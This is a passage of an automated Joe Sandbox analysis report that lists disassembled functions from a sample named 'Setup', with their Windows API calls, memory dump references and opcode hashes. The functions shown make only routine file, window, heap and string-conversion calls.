                                                                                              • Opcode ID: 79015ae607570ada4ef89b89d6975551c8bffcd91b548846ac0f92f8469d9c79
                                                                                              • Instruction ID: ac14ac90644abe4ba610951a932c4dd4918cd7ddcaf6c38a31b8bddeacb82e64
                                                                                              • Opcode Fuzzy Hash: 79015ae607570ada4ef89b89d6975551c8bffcd91b548846ac0f92f8469d9c79
                                                                                              • Instruction Fuzzy Hash: 5AF03674705A079BD74CDF3885513E9F6A1BF58308F41453E901DE7741C731A828CB84
                                                                                              Function 6394B93E Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394B945
                                                                                                • Part of subcall function 6396830D: _vwprintf.LIBCMT ref: 63968353
                                                                                                • Part of subcall function 6396830D: _vswprintf_s.LIBCMT ref: 63968378
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3682816334-0
                                                                                              • Opcode ID: 3b99a142f24efd931e06515e572760ebc2eeb41671150ead45767456e2dd2063
                                                                                              • Instruction ID: c35aba26e1e1567153c3bf21c7dd2d096d5bc7d4a196fdeb059380e730291a55
                                                                                              • Opcode Fuzzy Hash: 3b99a142f24efd931e06515e572760ebc2eeb41671150ead45767456e2dd2063
                                                                                              • Instruction Fuzzy Hash: 3CF0157062024ADFDF20DFA4C848AAEB7B5BF41B18F408829E555AB291DB30DA15CF51
                                                                                              Function 639577A9 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 639577CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: ee45da9ae3aa03de5ca18a0ad4e0ed5923ffd7ed12f5ede247075c6f5010cca5
                                                                                              • Instruction ID: 7632248fcc2c971b266f7c1b7b8320ef049047421a49f1835c90bae769b677c1
                                                                                              • Opcode Fuzzy Hash: ee45da9ae3aa03de5ca18a0ad4e0ed5923ffd7ed12f5ede247075c6f5010cca5
                                                                                              • Instruction Fuzzy Hash: 60E09A306402009FC720DB24EC49F1A7BAABB86B10F104158F5168B1A1CB30E881CE00
                                                                                              Function 63967E56 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000006,?,?,?,?,6394DAC1,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 63967E76
                                                                                                • Part of subcall function 63967F08: GetLastError.KERNEL32(63967B0B,?,?,?,00000000), ref: 63967F08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: cc102b64f771a0c9c8c1f056495475d08c587691fbd83c29bb6e4d3b102b988c
                                                                                              • Instruction ID: a47b869ce03b8abf70d04654666332c115b8ee102e3ce7b1e6a691d090595fe0
                                                                                              • Opcode Fuzzy Hash: cc102b64f771a0c9c8c1f056495475d08c587691fbd83c29bb6e4d3b102b988c
                                                                                              • Instruction Fuzzy Hash: F8E01A71600248BF9B05DFA5D844D9E7BB9EB4A364B104659F925D32A0EB70EE14DF20
                                                                                              Function 6C8C39AD Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                                • Part of subcall function 6C918DCD: _vwprintf.LIBCMT ref: 6C918E13
                                                                                                • Part of subcall function 6C918DCD: _vswprintf_s.LIBCMT ref: 6C918E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3682816334-0
                                                                                              • Opcode ID: 527827e2ae54dabb84e2ef0562fa68b61657ee6955b93a56ff9893472b59c33c
                                                                                              • Instruction ID: 6130cca6e51790a07868bd50827f93d92b112266243bdd1d31f1380664f266ca
                                                                                              • Opcode Fuzzy Hash: 527827e2ae54dabb84e2ef0562fa68b61657ee6955b93a56ff9893472b59c33c
                                                                                              • Instruction Fuzzy Hash: 79F01C3062024ADFDF00DFA4C849AEEB7B6FF50318F048815E4509BB50CB34D919DB95
                                                                                              Function 6C925514 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5beade4c2493959faf4449c78c43680f33a13fb73acf94ce3392477ead92495
                                                                                              • Instruction ID: 44823a7abf8dc0305779502f361466f9d85a6ae0ec6f8fb4dbcba68d9c422b6a
                                                                                              • Opcode Fuzzy Hash: d5beade4c2493959faf4449c78c43680f33a13fb73acf94ce3392477ead92495
                                                                                              • Instruction Fuzzy Hash: 32E0C235114109FF8B019FA5C808C897FBAFF19359714C065F8498A528D736CA54EB81
                                                                                              Function 6C8C8129 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C8CAA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C8C8149
                                                                                                • Part of subcall function 6C9189C8: GetLastError.KERNEL32(6C8C80E8,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9189C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 7cbe515f6ee35c3a55642804b8cf3112775bf21c3f3a5e63751bdf98159ad822
                                                                                              • Instruction ID: 9128e6cffe05dca637f1fa7aa6e4de99c5301e792b136bd76d1832cb66d8d7dd
                                                                                              • Opcode Fuzzy Hash: 7cbe515f6ee35c3a55642804b8cf3112775bf21c3f3a5e63751bdf98159ad822
                                                                                              • Instruction Fuzzy Hash: FAE09A71600108BF8B04CFA4C944C8E3BF8EF09364B104A2AF925D3280DB70EA00EB61
                                                                                              Function 6C8C395E Relevance: 1.5, APIs: 1, Instructions: 22COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C3965
                                                                                                • Part of subcall function 6C8F8C24: __EH_prolog3.LIBCMT ref: 6C8F8C2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 8cbc30e87a72e55677796b9bd1e55dd3e2221309323cdd1ceca5d8a10d61d299
                                                                                              • Instruction ID: 6c45d8f5e340573dd8a5def21e6419b811c722b655a9165c88b811cf4978fa3b
                                                                                              • Opcode Fuzzy Hash: 8cbc30e87a72e55677796b9bd1e55dd3e2221309323cdd1ceca5d8a10d61d299
                                                                                              • Instruction Fuzzy Hash: B5F0397151010AEFCB10DFB8C945A9DB762BF20318F208655E1509BB99CB35E928DBA5
                                                                                              Function 6C8C391D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C3924
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 683a3349fe3f35f99b020994a88a6b2042daeb5eb5e502bfda5a5dbc85a4df15
                                                                                              • Instruction ID: a8965bc38c99f69de792fce3055a3c5f200b917095ae6c238cdb9c7e3bd37b5e
                                                                                              • Opcode Fuzzy Hash: 683a3349fe3f35f99b020994a88a6b2042daeb5eb5e502bfda5a5dbc85a4df15
                                                                                              • Instruction Fuzzy Hash: 25E0EE39601219ABCB118F58C940A9EBBA1FF28314F10C409F9699BB60C774EA25EB51
                                                                                              Function 6C8C80F7 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C8F60F1), ref: 6C8C810D
                                                                                                • Part of subcall function 6C9189C8: GetLastError.KERNEL32(6C8C80E8,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9189C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastWrite
                                                                                              • String ID:
                                                                                              • API String ID: 442123175-0
                                                                                              • Opcode ID: 088c2b2347b47ee53a62aa85ba9626b1477066117ec88408f3de9dfe01eb4b3b
                                                                                              • Instruction ID: 1140449cd392dbc059effdc0463793134f047aa55fb01a6c02402346821a85a5
                                                                                              • Opcode Fuzzy Hash: 088c2b2347b47ee53a62aa85ba9626b1477066117ec88408f3de9dfe01eb4b3b
                                                                                              • Instruction Fuzzy Hash: B5D0173234420CBFDB108FA2CD05E9A3BADFB55714F004423FA1486910EB32D420DB62
                                                                                              Function 6C8F8380 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                                • Part of subcall function 6C8F84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794,00000000), ref: 6C8F851E
                                                                                                • Part of subcall function 6C8F84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794), ref: 6C8F853F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 692526729-0
                                                                                              • Opcode ID: 6db3873be8ab953ff8db24611959aed2fcff45d69818b4fc01d0e1dce50a813e
                                                                                              • Instruction ID: 25dfa280b0944579696f87bafe45d7a5d4824481ab269aa18a93456f5b12020f
                                                                                              • Opcode Fuzzy Hash: 6db3873be8ab953ff8db24611959aed2fcff45d69818b4fc01d0e1dce50a813e
                                                                                              • Instruction Fuzzy Hash: FEE0123521122467DF117F548A01BCE33516F3175CF10C451E9906FF54CB39CA2AD6A9
                                                                                              Function 6C8F833E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: cbce3b873b0349ae179a95f7d3459a0316183ebd2a4742c3d6ef460cec69feeb
                                                                                              • Instruction ID: 3d3b7ad7377602d4f77692a1e555f56c5ecef68e9d72c7eae29f6a94bf8b0912
                                                                                              • Opcode Fuzzy Hash: cbce3b873b0349ae179a95f7d3459a0316183ebd2a4742c3d6ef460cec69feeb
                                                                                              • Instruction Fuzzy Hash: ABE0123521521867DF116F648A11BCE33116F3175CF11C441E8906FF54C739CA2AD6A9
                                                                                              Function 6394FF14 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                                • Part of subcall function 6395007B: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 639500A9
                                                                                                • Part of subcall function 6395007B: SetWindowPos.USER32(0000000C,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 639500E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ChildEnumWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1604351572-0
                                                                                              • Opcode ID: b7cec41c10ea59afec7e12e1faa0bb4b6fad3ca17ffdfcc471101db60a95e463
                                                                                              • Instruction ID: 79a2b8b16d1976c2cf5cff334024281276a8c834895a29fe6faf6238d2a959bb
                                                                                              • Opcode Fuzzy Hash: b7cec41c10ea59afec7e12e1faa0bb4b6fad3ca17ffdfcc471101db60a95e463
                                                                                              • Instruction Fuzzy Hash: AAC08C3A0062307B47303A306808C9B29C9AE93AA83050081B001810124B10CC52CEE0
                                                                                              Function 6C9254F2 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C925505
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: d568c9f499b653ec89d8e7fdd0bdebda28bdd9dce116ba7bad7de47fbca2cd5f
                                                                                              • Instruction ID: c0ef8afaa7a11b34c6cb1cb58e918e67d1c9131dc2f32c834d3bd9013cbbf4b9
                                                                                              • Opcode Fuzzy Hash: d568c9f499b653ec89d8e7fdd0bdebda28bdd9dce116ba7bad7de47fbca2cd5f
                                                                                              • Instruction Fuzzy Hash: 42C08C32041608FBCF224E80DC09F9ABF6AEB85358F24C020B61C098A0C776D5A1DAC4
                                                                                              Function 6C8F91AF Relevance: 1.5, APIs: 1, Instructions: 11comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,6C8CB029,?,0000002C,6C90D55B,?,?,?,?,00000001), ref: 6C8F91C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID:
                                                                                              • API String ID: 542301482-0
                                                                                              • Opcode ID: 4856d69a9f70c1799a475e2b1162a6d5427bde45de71847a375c7f3b67c8efdd
                                                                                              • Instruction ID: 6cc0d4023d1fe1ac11881130ea2c7534691745a655e8a5d2ec8d74e8687ef2a1
                                                                                              • Opcode Fuzzy Hash: 4856d69a9f70c1799a475e2b1162a6d5427bde45de71847a375c7f3b67c8efdd
                                                                                              • Instruction Fuzzy Hash: 18C02B3218020CFBC73005C1DC05FE9BE29D7C5754F014811F318347828671B410F5A9
                                                                                              Function 6C9254D6 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C9254E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 51ef4869f51948533519c9a7db4b9113c90136ebed2ac435697349f06da90c0d
                                                                                              • Instruction ID: c7955d3eac8c0537399203bacb28f23c29ab8a65d7a47aaca98cd0af1aca4fb8
                                                                                              • Opcode Fuzzy Hash: 51ef4869f51948533519c9a7db4b9113c90136ebed2ac435697349f06da90c0d
                                                                                              • Instruction Fuzzy Hash: B5C09B36140108F7CB111EC1DC05F45BF69D795755F14C061F60805452C777D421D6D4
                                                                                              Function 6C8CC53D Relevance: 1.3, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,6C8FA320,38D98A99,?,?), ref: 6C8CC55E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1452528299-0
                                                                                              • Opcode ID: 9378503ebce091921dad03cd518232b03ea10dd0e97cea9a1f55a21fb2e31c76
                                                                                              • Instruction ID: 25dbc049d17dd5aa6af42ecc193cd53f5e059019d99194a09c2fce7b639c3823
                                                                                              • Opcode Fuzzy Hash: 9378503ebce091921dad03cd518232b03ea10dd0e97cea9a1f55a21fb2e31c76
